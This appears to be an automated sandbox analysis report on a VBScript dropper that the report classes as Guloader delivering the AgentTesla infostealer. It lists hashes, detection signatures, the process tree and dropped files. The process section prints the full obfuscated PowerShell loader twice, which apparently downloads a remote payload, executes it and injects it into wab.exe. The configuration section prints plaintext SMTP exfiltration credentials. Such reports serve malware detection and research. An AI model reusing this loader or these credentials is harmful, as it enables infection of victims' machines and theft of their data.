Analysis

  • max time kernel
    147s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-04-2024 01:07

General

  • Target

    223d2f80a60223db2bcdf49cdafd000c7242bb7c3e87ff1a354697719483e68f.vbs

  • Size

    278KB

  • MD5

    8e17d7f6a7a42733f0ff057dcd6e8be8

  • SHA1

    8fe0a41955cf840843da296ecf7b1a57b0a9dfa9

  • SHA256

    223d2f80a60223db2bcdf49cdafd000c7242bb7c3e87ff1a354697719483e68f

  • SHA512

    bffddba40c4a976db4341abb8fd9299eb918416c841dd7c9853e345f71de0810757c1bd5148dad5295752faaca9b3e440828b35685363d3ed341aac820be7b3d

  • SSDEEP

    6144:LBdAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scObd8lxtRaFp:VnS2Iml8xrMVai

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.myhydropowered.com
  • Port:
    587
  • Username:
    antenna@myhydropowered.com
  • Password:
    jnKkQ2DFtjsDqGZ
  • Email To:
    gazatiming@myhydropowered.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\223d2f80a60223db2bcdf49cdafd000c7242bb7c3e87ff1a354697719483e68f.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BelieNOffsheRdseltBe or. Sco.WPoiaae IchtbGi maCKarikl.oostiOpildemedt,nBa.stt Flyd ');Salsdren (Spatiumet ',leek$BerigFPol to,efairPu pessymboeRussinmidd dCeltieDiamalUbesksForgie ites Beseo SkanmForlakBem.loDobbesGadertTouchnsterniShirtnUnoffgSeksae rbejrPalme.Ers aHBelyseManeuaOmniadSupereHewabrTelefsMot,t[ maxi$Kv ntA padrnTen.raBranctToresh,rgameLandlmSekreamyrmit AftriSa,dss T.awe pr.s]N.rin=P,lit$Es.reMNeglpoU derrLivegaja oulEuryglSuitioTiltrvanorge S.rvnDrvtye sh,p ');$Samosa=Spatiumet 'ConfiFSatsao emarrUnpolsPreseesacchn.ichwd Unsue Rgfol vicisMudroeUdenrsunderoFe,mimWe,dik SkruoRejecsBisamtLeeronfeignirustknDonkrgPettie P.anr ,ort.KlammD Ta,ooSal swGrms.nVirkelTurboo Synda A.lgdRikocFAstroi Calal,aneveBroch(Aquo.$.achiAMisgriK.yedvRejserUnpul,Lippi$ F blJ Te eaRetsbkUnsenkP,aine eknonGehe,)Drmme ';$Samosa=$fluktuering[1]+$Samosa;$Jakken=$fluktuering[0];Salsdren (Spatiumet 'Disso$ au.ogAkkrel Estlo .ippbNytteaStupelPmkha:UndefPBotuleRiposrFljtecSove,aSpeci= Tele(M.sicTModule,etersGenh.t Nedb-St,afP Pul,aVitaltBi.lehNitsk Line$BecooJ Orfealasttk.orlfkCost,eslughnSrege)Spalt ');while (!$Perca) {Salsdren (Spatiumet ' Udko$Al.ingStjfolSmickoValutbUnmonaRealelProf.:Rel.tIDrejedSnowseLagenn Se,ttDohiciAbsu.t,avebeGniddtSupers ommemPaatar.aagekIncaveH ldnsAgoni=mult.$LatertBagt.r M.saum.ljreObeys ') ;Salsdren $Samosa;Salsdren (Spatiumet ' CareSS.aldtTinneaAristrI dvatKomme-Oste.SAlbu.lTrumfeGuldse AfkapGoitc Boks4 oms ');Salsdren (Spatiumet 'Inds $GnavegPreexl MonsoKinetbjasesaRevislVario:drommP UndeeTher rBrewic Sm aarepos= O,er(ReinfTMetase MisfsMinvetRote,- IrriPIntelaArve.tSublah Supe Pyrhe$EnemrJ Badma AmtskVliesk Solne ,auhn Ci,c) Car ') ;Salsdren (Spatiumet ' Hrsi$KendegYn lilDyretoli,jebKantoa Han,lSkand:HighlLUnderuPathomResneb.utotuPaakrsH,eft=P.ior$Latiag RegnlUndero Ske,b Ma.daTrykkl ani:Ri gkBHemipeRepr,gSu.errWrencaCan.ivse ebe P,rglChecksStarteSkyhjsStrenkForesaReflep MurreDri ll ProplOrycteBrnefrLejeishande+O.tiu+,luxa%Zilli$TaxafAF rstn BalktAdganhsarder IronoDefacpFlugtoshillpVizorh Kabea LonggLuftii P,risAg.sttReshiiAutorcKrakk.Bra.lcTra ioRkemou nternInvestCodeb ') ;$Aivr=$Anthropophagistic[$Lumbus];}Salsdren (Spatiumet ' ,lan$FortsgInforlSelvio SkinbRanseaRohrnlAnekd: eminNcatasuPirozmNabobmscutceRerair Frnup MaullPaaskaTakstdEnunceA rornDoktosEleme Tast=eskad cadeG Copre AarmtS ffl-DitetCTestdos,linnstafft.aunueKalkbnVarmet Cond Pron,$SymboJP,nctaB,plak undekSquigeYarurnUbaad ');Salsdren (Spatiumet 'Tryne$A vecgLay rlNikoloI filb fkapaKontol Gkke:FerieSUnmigpMetreaAparttDelegtPalaelFlinkeVestidMaci. Mumme=Handy Pythi[ DileSReattyRevissred vtKollieU eldmMi op.PolteCSiennoCh,omnVauntv AngreMindsrMesost.llit]Apter:Somme: oragFAvicur k.sto NdspmOver B.viseaAnda.sH,droekonve6R,gne4 SnotS CasttInflurNonsei ConvnBussegScoli( sple$Omn,pN.uelouJournm FootmVita,eUdklarRespopRegislUdsaeaSuppldAm.anet,enenBekissVesic)Strej ');Salsdren (Spatiumet 'Annso$Be.aigMad.il Suggo,rimeb Fugta Kon,lU.pan:MarinSMiljtp rilsaBendlcMasseiBlankoGyropuphospsDberelMimicy Alp. Sdemn= stje Retti[ PneuSDebriyKnyt.s .aantE.seme kampmOtari.PredeT Stv,eLejekxCentrt Pupi.GramiE Un nnFibricFagfoo.ehondOpspuiFastenLithogIndi,]Basi,:herov: M.thAJobbeSEyewaC AfifIIndisIHand,.AlgotGSkraleAraertTerriSPapritToskirI dbriLazarnvrkstgattro(Bedst$Ho,edS,enzppS,angaElgabtRunddt AktilB.gheeGlaned nder)Telec ');Salsdren (Spatiumet 'Nuanc$SicilgBladelTil,roi stabMuta,aCandllPorr,:MenneESpejlpTilreiCassosSkrespIndfra Ly.psAnal tScrabiD,miccM,lie=Tarif$ RdhaSPandepHalslaC.stoc TragiAfmaroSeconu Av ssRe oglUnderyPedes.Un,onsTilleuMati b.ejltsFri et GosprP,ryni Qu cnRes,rgadopt(Polys2 ilis9Brudf2Ka,in8Rteb.4Mobil6dtr n,,rusi2Mulig8Under3Smel,5Tel,g8Faneb) nmed ');Salsdren $Epispastic;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"
        3⤵
          PID:3288
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BelieNOffsheRdseltBe or. Sco.WPoiaae IchtbGi maCKarikl.oostiOpildemedt,nBa.stt Flyd ');Salsdren (Spatiumet ',leek$BerigFPol to,efairPu pessymboeRussinmidd dCeltieDiamalUbesksForgie ites Beseo SkanmForlakBem.loDobbesGadertTouchnsterniShirtnUnoffgSeksae rbejrPalme.Ers aHBelyseManeuaOmniadSupereHewabrTelefsMot,t[ maxi$Kv ntA padrnTen.raBranctToresh,rgameLandlmSekreamyrmit AftriSa,dss T.awe pr.s]N.rin=P,lit$Es.reMNeglpoU derrLivegaja oulEuryglSuitioTiltrvanorge S.rvnDrvtye sh,p ');$Samosa=Spatiumet 'ConfiFSatsao emarrUnpolsPreseesacchn.ichwd Unsue Rgfol vicisMudroeUdenrsunderoFe,mimWe,dik SkruoRejecsBisamtLeeronfeignirustknDonkrgPettie P.anr ,ort.KlammD Ta,ooSal swGrms.nVirkelTurboo Synda A.lgdRikocFAstroi Calal,aneveBroch(Aquo.$.achiAMisgriK.yedvRejserUnpul,Lippi$ F blJ Te eaRetsbkUnsenkP,aine eknonGehe,)Drmme ';$Samosa=$fluktuering[1]+$Samosa;$Jakken=$fluktuering[0];Salsdren (Spatiumet 'Disso$ au.ogAkkrel Estlo .ippbNytteaStupelPmkha:UndefPBotuleRiposrFljtecSove,aSpeci= Tele(M.sicTModule,etersGenh.t Nedb-St,afP Pul,aVitaltBi.lehNitsk Line$BecooJ Orfealasttk.orlfkCost,eslughnSrege)Spalt ');while (!$Perca) {Salsdren (Spatiumet ' Udko$Al.ingStjfolSmickoValutbUnmonaRealelProf.:Rel.tIDrejedSnowseLagenn Se,ttDohiciAbsu.t,avebeGniddtSupers ommemPaatar.aagekIncaveH ldnsAgoni=mult.$LatertBagt.r M.saum.ljreObeys ') ;Salsdren $Samosa;Salsdren (Spatiumet ' CareSS.aldtTinneaAristrI dvatKomme-Oste.SAlbu.lTrumfeGuldse AfkapGoitc Boks4 oms ');Salsdren (Spatiumet 'Inds $GnavegPreexl MonsoKinetbjasesaRevislVario:drommP UndeeTher rBrewic Sm aarepos= O,er(ReinfTMetase MisfsMinvetRote,- IrriPIntelaArve.tSublah Supe Pyrhe$EnemrJ Badma AmtskVliesk Solne ,auhn Ci,c) Car ') ;Salsdren (Spatiumet ' Hrsi$KendegYn lilDyretoli,jebKantoa Han,lSkand:HighlLUnderuPathomResneb.utotuPaakrsH,eft=P.ior$Latiag RegnlUndero Ske,b Ma.daTrykkl ani:Ri gkBHemipeRepr,gSu.errWrencaCan.ivse ebe P,rglChecksStarteSkyhjsStrenkForesaReflep MurreDri ll ProplOrycteBrnefrLejeishande+O.tiu+,luxa%Zilli$TaxafAF rstn BalktAdganhsarder IronoDefacpFlugtoshillpVizorh Kabea LonggLuftii P,risAg.sttReshiiAutorcKrakk.Bra.lcTra ioRkemou nternInvestCodeb ') ;$Aivr=$Anthropophagistic[$Lumbus];}Salsdren (Spatiumet ' ,lan$FortsgInforlSelvio SkinbRanseaRohrnlAnekd: eminNcatasuPirozmNabobmscutceRerair Frnup MaullPaaskaTakstdEnunceA rornDoktosEleme Tast=eskad cadeG Copre AarmtS ffl-DitetCTestdos,linnstafft.aunueKalkbnVarmet Cond Pron,$SymboJP,nctaB,plak undekSquigeYarurnUbaad ');Salsdren (Spatiumet 'Tryne$A vecgLay rlNikoloI filb fkapaKontol Gkke:FerieSUnmigpMetreaAparttDelegtPalaelFlinkeVestidMaci. Mumme=Handy Pythi[ DileSReattyRevissred vtKollieU eldmMi op.PolteCSiennoCh,omnVauntv AngreMindsrMesost.llit]Apter:Somme: oragFAvicur k.sto NdspmOver B.viseaAnda.sH,droekonve6R,gne4 SnotS CasttInflurNonsei ConvnBussegScoli( sple$Omn,pN.uelouJournm FootmVita,eUdklarRespopRegislUdsaeaSuppldAm.anet,enenBekissVesic)Strej ');Salsdren (Spatiumet 'Annso$Be.aigMad.il Suggo,rimeb Fugta Kon,lU.pan:MarinSMiljtp rilsaBendlcMasseiBlankoGyropuphospsDberelMimicy Alp. Sdemn= stje Retti[ PneuSDebriyKnyt.s .aantE.seme kampmOtari.PredeT Stv,eLejekxCentrt Pupi.GramiE Un nnFibricFagfoo.ehondOpspuiFastenLithogIndi,]Basi,:herov: M.thAJobbeSEyewaC AfifIIndisIHand,.AlgotGSkraleAraertTerriSPapritToskirI dbriLazarnvrkstgattro(Bedst$Ho,edS,enzppS,angaElgabtRunddt AktilB.gheeGlaned nder)Telec ');Salsdren (Spatiumet 'Nuanc$SicilgBladelTil,roi stabMuta,aCandllPorr,:MenneESpejlpTilreiCassosSkrespIndfra Ly.psAnal tScrabiD,miccM,lie=Tarif$ RdhaSPandepHalslaC.stoc TragiAfmaroSeconu Av ssRe oglUnderyPedes.Un,onsTilleuMati b.ejltsFri et GosprP,ryni Qu cnRes,rgadopt(Polys2 ilis9Brudf2Ka,in8Rteb.4Mobil6dtr n,,rusi2Mulig8Under3Smel,5Tel,g8Faneb) nmed ');Salsdren $Epispastic;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4932
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"
            4⤵
              PID:4604
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:4348

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lm1ou5ss.jvb.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Electronegative.Sha
        Filesize

        418KB

        MD5

        9c31078f20d1025a629ad3b00e375e75

        SHA1

        e97e1b2f4ba5ff49b7c3088da22361f8fc591c1e

        SHA256

        32166efe799af464aaf4c00accf9db2d6978a177ee87eeaddd9e769df84fbc6b

        SHA512

        c7097172696ad1e054eee11f7aac24192e8afc5c8603378f2e3c872b82a27d7dc4671157110017e2b300fe68d354c938dd3d79fffc66efe355e814c1b87e9410

      • memory/1468-11-0x000001DD521A0000-0x000001DD521C2000-memory.dmp
        Filesize

        136KB

      • memory/1468-12-0x00007FFC5AEF0000-0x00007FFC5B9B1000-memory.dmp
        Filesize

        10.8MB

      • memory/1468-13-0x000001DD379D0000-0x000001DD379E0000-memory.dmp
        Filesize

        64KB

      • memory/1468-14-0x000001DD379D0000-0x000001DD379E0000-memory.dmp
        Filesize

        64KB

      • memory/1468-80-0x00007FFC5AEF0000-0x00007FFC5B9B1000-memory.dmp
        Filesize

        10.8MB

      • memory/1468-46-0x000001DD379D0000-0x000001DD379E0000-memory.dmp
        Filesize

        64KB

      • memory/1468-45-0x000001DD379D0000-0x000001DD379E0000-memory.dmp
        Filesize

        64KB

      • memory/1468-44-0x000001DD379D0000-0x000001DD379E0000-memory.dmp
        Filesize

        64KB

      • memory/1468-43-0x00007FFC5AEF0000-0x00007FFC5B9B1000-memory.dmp
        Filesize

        10.8MB

      • memory/4348-58-0x00000000773B8000-0x00000000773B9000-memory.dmp
        Filesize

        4KB

      • memory/4348-57-0x0000000001A90000-0x0000000004AAE000-memory.dmp
        Filesize

        48.1MB

      • memory/4348-89-0x0000000022650000-0x0000000022660000-memory.dmp
        Filesize

        64KB

      • memory/4348-88-0x0000000074910000-0x00000000750C0000-memory.dmp
        Filesize

        7.7MB

      • memory/4348-85-0x0000000001A90000-0x0000000004AAE000-memory.dmp
        Filesize

        48.1MB

      • memory/4348-84-0x0000000023190000-0x000000002319A000-memory.dmp
        Filesize

        40KB

      • memory/4348-83-0x0000000023230000-0x00000000232C2000-memory.dmp
        Filesize

        584KB

      • memory/4348-82-0x0000000023140000-0x0000000023190000-memory.dmp
        Filesize

        320KB

      • memory/4348-76-0x0000000022650000-0x0000000022660000-memory.dmp
        Filesize

        64KB

      • memory/4348-74-0x0000000074910000-0x00000000750C0000-memory.dmp
        Filesize

        7.7MB

      • memory/4348-75-0x0000000000830000-0x0000000000872000-memory.dmp
        Filesize

        264KB

      • memory/4348-72-0x0000000000830000-0x0000000001A84000-memory.dmp
        Filesize

        18.3MB

      • memory/4348-59-0x0000000077331000-0x0000000077451000-memory.dmp
        Filesize

        1.1MB

      • memory/4932-52-0x0000000005400000-0x0000000005410000-memory.dmp
        Filesize

        64KB

      • memory/4932-21-0x0000000006100000-0x0000000006122000-memory.dmp
        Filesize

        136KB

      • memory/4932-47-0x0000000074910000-0x00000000750C0000-memory.dmp
        Filesize

        7.7MB

      • memory/4932-48-0x0000000007EF0000-0x0000000007EF1000-memory.dmp
        Filesize

        4KB

      • memory/4932-49-0x0000000009410000-0x000000000C42E000-memory.dmp
        Filesize

        48.1MB

      • memory/4932-50-0x0000000009410000-0x000000000C42E000-memory.dmp
        Filesize

        48.1MB

      • memory/4932-33-0x0000000006370000-0x00000000066C4000-memory.dmp
        Filesize

        3.3MB

      • memory/4932-53-0x0000000005400000-0x0000000005410000-memory.dmp
        Filesize

        64KB

      • memory/4932-54-0x0000000005400000-0x0000000005410000-memory.dmp
        Filesize

        64KB

      • memory/4932-55-0x0000000077331000-0x0000000077451000-memory.dmp
        Filesize

        1.1MB

      • memory/4932-56-0x0000000009410000-0x000000000C42E000-memory.dmp
        Filesize

        48.1MB

      • memory/4932-20-0x0000000005A80000-0x00000000060A8000-memory.dmp
        Filesize

        6.2MB

      • memory/4932-17-0x0000000074910000-0x00000000750C0000-memory.dmp
        Filesize

        7.7MB

      • memory/4932-19-0x0000000005400000-0x0000000005410000-memory.dmp
        Filesize

        64KB

      • memory/4932-22-0x00000000061A0000-0x0000000006206000-memory.dmp
        Filesize

        408KB

      • memory/4932-73-0x0000000074910000-0x00000000750C0000-memory.dmp
        Filesize

        7.7MB

      • memory/4932-23-0x0000000006280000-0x00000000062E6000-memory.dmp
        Filesize

        408KB

      • memory/4932-41-0x0000000008E60000-0x0000000009404000-memory.dmp
        Filesize

        5.6MB

      • memory/4932-40-0x0000000007C00000-0x0000000007C22000-memory.dmp
        Filesize

        136KB

      • memory/4932-77-0x0000000009410000-0x000000000C42E000-memory.dmp
        Filesize

        48.1MB

      • memory/4932-18-0x0000000005410000-0x0000000005446000-memory.dmp
        Filesize

        216KB

      • memory/4932-39-0x0000000007C70000-0x0000000007D06000-memory.dmp
        Filesize

        600KB

      • memory/4932-38-0x0000000006F50000-0x0000000006F6A000-memory.dmp
        Filesize

        104KB

      • memory/4932-37-0x0000000008230000-0x00000000088AA000-memory.dmp
        Filesize

        6.5MB

      • memory/4932-36-0x0000000005400000-0x0000000005410000-memory.dmp
        Filesize

        64KB

      • memory/4932-35-0x0000000006A00000-0x0000000006A4C000-memory.dmp
        Filesize

        304KB

      • memory/4932-34-0x00000000069D0000-0x00000000069EE000-memory.dmp
        Filesize

        120KB